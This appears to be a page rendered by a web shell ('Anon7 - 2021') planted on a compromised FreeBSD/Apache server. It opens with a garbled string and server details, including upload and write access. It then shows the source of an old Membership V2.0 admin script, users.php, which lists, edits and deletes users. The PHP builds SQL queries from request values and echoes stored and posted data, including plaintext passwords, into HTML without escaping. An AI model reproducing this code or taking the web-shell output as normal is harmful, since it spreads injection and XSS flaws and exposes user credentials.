KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/abtechsci/mmc15/Membership/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/abtechsci/mmc15/Membership/admin/users.php
<?php
/************* Membership V2.0 *******************/
/*
Released by AwesomePHP.com, under the GPL License, a
copy of it should be attached to the zip file, or
you can view it on http://AwesomePHP.com/gpl.txt
*/
/************* Membership V2.0 *******************/	
if($is_admin == false){ die();}

if($_POST['user_id'] == NULL){	$_POST['user_id'] = $_GET['user_id'];}


if(!is_numeric($_POST['user_id']) AND $_GET['do'] != 'Add'){	
	$get_list = "SELECT * FROM `memb_userlist`";
	$is_count = @mysql_query($get_list);
	$display_limit = '10'; 
	$items_count = @mysql_num_rows($is_count); 
	if($items_count > $display) { 
		$page_count = ceil ($items_count/$display_limit); 
	} else { 
		$page_count = 1; 
	}
	if(is_numeric($_GET['start'])){ 
	    $start = $_GET['start']; 
	} else { 
	    $start = 0; 
	} 
	$get_users = @mysql_query($get_list . " ORDER BY `user_id` DESC LIMIT $start,$display_limit");
?>
  <table width="100%"  border="1" cellspacing="0" cellpadding="5">
    <tr bgcolor="#BEDEDE">
      <td colspan="4"><div align="center"><font color="#999999" size="4"><strong>User List [<a href="?page=users&do=Add">Add</a>] </strong></font></div></td>
    </tr>
	<?php
	if($items_count > $display_limit){
	?>
    <tr>
      <td colspan="4"><div align="center"><?php include('pagination.php');?></div></td>
    </tr>
	<?php } ?>
    <tr bgcolor="#CAFFCA">
      <td width="25%"><div align="center"><font size="2"><strong>User Name </strong></font></div></td>
      <td width="25%" bgcolor="#CAFFCA"><div align="center"><font size="2"><strong>User Email </strong></font></div></td>
      <td width="25%"><div align="center"><font size="2"><strong>User Status </strong></font></div></td>
      <td width="25%"><div align="center"><font size="2"><strong>Options</strong></font></div></td>
    </tr>
	<?php
	if($items_count <= 0){ echo '<tr><td colspan="4">No users found.</td><tr>';}
	while($each = mysql_fetch_assoc($get_users)){?>
    <tr>
      <td width="25%"><font color="#990000" size="2"><?php echo $each['user_name'];?></font></td>
      <td width="25%"><font color="#990000" size="2"><?php echo $each['user_email'];?></font></td>
      <td width="25%"><font color="#990000" size="2"><?php if($each['user_status'] == 1){ echo 'Active';}else{echo 'Disabled';}?></font></td>
      <td width="25%"><div align="center"><font size="2">[<a href="?page=users&user_id=<?php echo $each['user_id'];?>">Edit/Remove</a>] [<a href="?page=payments&user_id=<?php echo $each['user_id'];?>">Payments</a>]</font></div></td>
    </tr>
	<?php } ?>
</table>
<?php } else { 
	if($_POST['user_id'] != NULL){
		$_POST = mysql_fetch_assoc(mysql_query("SELECT * FROM `memb_userlist` WHERE `user_id`='$_POST[user_id]'"));
	}
	?>  
  <form name="users" id="users" method="post" action="?page=users&user_id<?php echo $_POST['user_id'];?>" style="display:inline;">
  <table width="100%"  border="1" cellspacing="0" cellpadding="5">
    <tr bgcolor="#BEDEDE">
      <td colspan="2"><div align="center"><font color="#999999" size="4"><strong>Add/Edit User: </strong></font></div></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">User Name:</font></td>
      <td width="50%"><font size="2">
	    <input name="user_name" type="text" id="user_name" value="<?php echo $_POST['user_name'];?>" class="hiddenText">
	    <input name="old_name" type="hidden" id="old_name" value="<?php echo $_POST['user_name'];?>" class="hiddenText">
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">User Email:</font></td>
      <td width="50%"><font size="2">
        <input name="user_email" type="text" id="user_email" value="<?php echo $_POST['user_email'];?>" class="hiddenText">
        <input name="old_email" type="hidden" id="old_email" value="<?php echo $_POST['user_email'];?>" class="hiddenText">
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">User Password:</font></td>
      <td width="50%"><font size="2">
        <input name="user_password" type="text" id="user_password" value="<?php echo $_POST['user_password'];?>" class="hiddenText">
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">Membership:</font></td>
      <td><font size="2">
        <select id="membership_id" name="membership_id" class="hiddenText">
          <?php
	  $query = mysql_query("SELECT * FROM `memb_memberships`");
	  
	  while($em = mysql_fetch_assoc($query)){
	  	if($_POST['membership_id'] == $em['membership_id']){ $sel= ' selected';}else{$sel=NULL;}
	  	echo '<option value="'.$em['membership_id'].'"'.$sel.'>'.$em['membership_title'].'</option>';
	  }
	  ?>
        </select>
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">User Status: </font></td>
      <td width="50%">
	    <font size="2">
	  <?php if($_POST['user_status'] == '1' || $_POST['user_status'] == NULL){$sel = ' checked';}else{$sel=NULL;}?>
	  <input name="user_status" type="radio" value="1"<?php echo $sel;?>>
        On 
        <?php if($_POST['user_status'] == '2'){$sel = ' checked';}else{$sel=NULL;}?>
        <input name="user_status" type="radio" value="2"<?php echo $sel;?>>
        Off
		<?php if(strlen($_POST['user_status']) > 2){$sel = ' checked';}else{$sel=NULL;}?>
        <input name="user_status" type="radio" value="2"<?php echo $sel;?> disabled>
        Un-Confirmed</font></td>
    </tr>
    <tr>
      <td><font size="2">Allow Account Deletion: </font></td>
      <td width="50%">
	    <font size="2">
	  <?php if($_POST['allow_delete'] == '1' || $_POST['allow_delete'] == NULL){$sel = ' checked';}else{$sel=NULL;}?>
	  <input name="allow_delete" type="radio" value="1"<?php echo $sel;?>>
Yes
<?php if($_POST['allow_delete'] == '2'){$sel = ' checked';}else{$sel=NULL;}?>
  <input name="allow_delete" type="radio" value="2"<?php echo $sel;?>>
No</font></td>
    </tr>
    <tr>
      <td><font size="2">In Mailing List: </font></td>
      <td width="50%">
	    <font size="2">
	  <?php if($_POST['user_in_list'] == '1' || $_POST['user_in_list'] == NULL){$sel = ' checked';}else{$sel=NULL;}?>
	  <input name="user_in_list" type="radio" value="1"<?php echo $sel;?>>
Yes
<?php if($_POST['user_in_list'] == '2'){$sel = ' checked';}else{$sel=NULL;}?>
  <input name="user_in_list" type="radio" value="2"<?php echo $sel;?>>
No</font></td>
    </tr>
    <tr bgcolor="#CAFFCA">
      <td colspan="2"><font color="#0000FF" size="2"><strong>Custom Fields: </strong></font></td>
    </tr>
	<?php
	$get_fields = mysql_query("SELECT * FROM `memb_customfds`");
	$recrod_nums = mysql_num_rows($get_fields);
	if($recrod_nums <= 0){
		echo '<tr><td colspan="2"><strong>No custom fields on system.</strong></td></tr>';
	} else {
		$array_list = explode("\n",$_POST['custom_fields']);
		foreach($array_list as $line){
			$line = trim($line);
			if($line){
				//Format
				list($id,$value) = explode('{+|%|+}',$line);
				$id = substr($id,1,-1);$value = substr($value,1,-1);
				$_POST["cusfield_$id"] = $value;
			}
		}
		while($each = mysql_fetch_assoc($get_fields)){?>
    <tr>
      <td><font size="2">
        <?php echo $each['field_name'];?>:</font></td>
      <td width="50%"><font size="2">
        <input name="cusfield_<?php echo $each['field_id'];?>" type="text" id="cusfield_<?php echo $each['field_id'];?>" value="<?php echo $_POST['cusfield_'.$each['field_id']];?>"  class="hiddenText">
      </font></td>
    </tr>
	<?php } 
	}?>
    <tr bgcolor="#BEDEDE">
      <td colspan="2"><div align="center">
        <font size="2">
        <input type="submit" name="Submit" value="Submit" class="button">
        <input name="doid" type="hidden" id="doid" value="3">
        <input name="user_id" type="hidden" id="user_id" value="<?php echo $_POST['user_id'];?>">
        <input name="old_membership_id" type="hidden" id="old_membership_id" value="<?php echo $_POST['membership_id'];?>">
</font></div></td>
    </tr>
    <tr bgcolor="#CAFFCA">
      <td colspan="2"><div align="right">
        <font size="1">
        <input type="checkbox" id="do_delete" name="do_delete" value="yes">
Delete Users (will also delete payments by user) </font>      </div></td>
    </tr>
  </table>
</form>
<?php } ?>

Anon7 - 2021